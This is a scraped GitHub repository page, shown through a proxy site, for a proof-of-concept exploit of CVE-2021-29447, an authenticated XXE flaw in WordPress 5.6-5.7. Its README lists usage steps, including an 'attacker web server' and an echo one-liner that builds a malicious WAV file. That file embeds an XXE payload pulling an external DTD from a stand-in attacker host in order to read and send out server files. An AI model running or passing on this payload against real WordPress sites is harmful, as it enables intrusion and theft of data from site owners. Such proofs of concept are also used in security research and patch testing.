Skip to content

WordPress RCE - Authenticated XXE (CVE-2021-29447)

Notifications You must be signed in to change notification settings

Tux-MacG1v/CVE-2021-29447

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

$ make up-wp

Step2. Run Attacker web server

$ make up-mal

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

With wavefile npm

$ make make-wav

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

About

WordPress RCE - Authenticated XXE (CVE-2021-29447)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 49.4%
  • Makefile 45.3%
  • PHP 5.3%
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy